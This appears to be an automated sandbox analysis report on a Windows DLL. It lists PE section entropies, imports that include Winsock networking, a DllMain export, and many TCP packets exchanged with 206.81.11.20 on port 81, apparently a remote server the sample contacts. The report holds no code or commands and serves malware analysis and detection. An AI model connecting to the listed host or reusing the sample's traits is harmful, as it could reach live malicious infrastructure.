Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xbffa0	0xc0000	False	0.4825096130371094	data	6.513066353548951	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc1000	0x9aa74	0x9ac00	False	0.6430088221930533	data	6.476962463346799	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x15c000	0x21a0	0x1000	False	0.221923828125	data	2.7499649747222605	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x15f000	0x4c74	0x4e00	False	0.4794170673076923	data	5.862238365022606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x164000	0x15c	0x200	False	0.404296875	data	3.313755264166149	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x165000	0x380	0x400	False	0.4306640625	data	3.8042782358248646	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x166000	0x19d0	0x1a00	False	0.5151742788461539	data	5.451259502514512	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x1650a0	0x1a0	data	English	United States
RT_MANIFEST	0x165240	0x140	ASCII text, with very long lines (320), with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	SystemFunction036
KERNEL32.dll	HeapReAlloc, HeapFree, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, GetProcessHeap, HeapAlloc, CloseHandle, GetModuleHandleA, GetProcAddress, TryAcquireSRWLockExclusive, GetStdHandle, GetConsoleMode, GetLastError, WaitForSingleObject, WriteConsoleW, SetLastError, GetCurrentDirectoryW, GetCurrentProcess, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, GetCurrentThread, RtlCaptureContext, RtlLookupFunctionEntry, GetEnvironmentVariableW, GetModuleHandleW, FormatMessageW, SetHandleInformation, ExitProcess, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemTimeAsFileTime, AcquireSRWLockShared, ReleaseSRWLockShared, RtlVirtualUnwind, CreateFileW, SetFilePointerEx, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapSize, GetStringTypeW, GetFileType, LCMapStringW, FreeEnvironmentStringsW, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, TerminateProcess, RtlUnwindEx, InterlockedFlushSList, EncodePointer, RaiseException, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RtlPcToFileHeader, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW
ws2_32.dll	connect, recv, send, ioctlsocket, getpeername, getsockname, select, WSARecv, setsockopt, getsockopt, closesocket, WSASocketW, WSACleanup, WSAStartup, WSAGetLastError, getaddrinfo, freeaddrinfo, WSASend
bcrypt.dll	BCryptOpenAlgorithmProvider, BCryptGenRandom, BCryptCloseAlgorithmProvider

Exports

Name	Ordinal	Address
DllMain	1	0x18000f85d

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 10, 2022 11:43:10.653167963 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:10.726340055 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:10.755929947 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:10.756092072 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:10.756572008 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:10.827917099 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:10.828084946 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:10.828516006 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:10.858016968 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:10.929759979 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025154114 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025219917 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025259972 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025298119 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025335073 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025374889 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025367975 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.025412083 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025424957 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.025459051 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025485039 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.025496006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025533915 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.025562048 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.027386904 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.097647905 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.097732067 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.097794056 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.097853899 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.097918987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.097954035 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.097986937 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.097995996 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.098056078 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.098121881 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.098129034 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.098186016 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.098248959 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.098258018 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.102869987 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.127489090 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.127614975 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.127675056 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.127737045 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.127799988 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.127815962 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.127816916 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.127855062 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.127912045 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.127928972 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.127969980 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128034115 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128043890 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.128088951 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128146887 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128154039 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.128210068 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128271103 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.128276110 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128341913 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128401995 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.128408909 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128875017 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128940105 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.128952980 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.129003048 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.129059076 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.129067898 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.129098892 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.129117012 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.129182100 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.129267931 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.199461937 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199516058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199539900 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199564934 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199589014 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199616909 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199641943 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199666023 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199692011 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199717045 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199742079 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199760914 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199786901 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199812889 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199837923 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.199863911 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.200927019 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.201426983 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.204027891 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.204071045 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.204097986 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.204123974 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.204224110 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230098009 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230146885 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230176926 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230207920 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230240107 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230269909 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230298996 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230309010 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230309010 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230329037 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230357885 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230369091 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230386019 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230396986 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230415106 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230448961 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230456114 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230479956 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230509996 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230537891 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230537891 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230567932 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230577946 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230597973 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230628014 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230637074 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230655909 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230685949 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230696917 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230715036 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230745077 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230753899 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230773926 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230803013 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230818033 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230830908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230859995 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230871916 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230921030 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230959892 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.230986118 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.230992079 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.231023073 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.231043100 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.231050968 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.231079102 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.231096029 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.231107950 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.231157064 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.231209993 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.274543047 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.274622917 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.274668932 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.274712086 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.274760008 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.274802923 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.274795055 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.274847031 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.274861097 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.274861097 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.302181005 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302241087 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302283049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302325010 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302365065 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302406073 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302423954 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.302423954 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.302448988 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302467108 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.302489996 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302534103 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302598953 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302599907 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.302660942 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302666903 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.302725077 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302787066 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302797079 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.302858114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.302922010 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.302951097 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303025007 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303026915 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.303091049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303155899 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303172112 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.303194046 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303236961 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303267956 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.303278923 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303306103 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.303322077 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303364992 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303369045 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.303427935 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303493977 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303508043 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.303554058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303616047 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303628922 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.303678036 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.303679943 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303739071 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303750992 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.303806067 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303872108 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.303874016 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.304056883 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.305286884 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.305351019 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.305397034 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.305428982 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.332951069 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.332987070 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333010912 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333035946 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333059072 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333081961 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333110094 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333136082 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333161116 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333188057 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333189964 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333190918 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333190918 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333214045 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333241940 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333267927 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333270073 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333292961 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333295107 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333322048 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333348989 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333357096 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333375931 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333403111 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333408117 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333430052 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333456039 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333471060 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333482981 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333509922 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333518982 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333534956 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333564043 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333574057 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333589077 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333616018 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333621025 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333642006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333669901 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333673954 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333697081 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333723068 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333725929 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333750010 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333777905 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333781004 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333805084 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333832979 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333837986 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333862066 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333887100 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333893061 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333914042 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333940983 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333949089 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.333969116 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.333998919 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.334007025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.334034920 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.334064007 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.334067106 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.334089041 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.334170103 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.334171057 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.335228920 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.349356890 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.349451065 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.349519968 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.349591970 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.352041006 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.376589060 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.376635075 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.376663923 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.376693964 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.376724005 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.376754045 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.376822948 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.376823902 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.376890898 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.376916885 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.376945019 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.405220985 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405286074 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405328989 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405374050 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405417919 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405461073 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.405510902 CET	81	49172	206.81.11.20	192.168.2.22
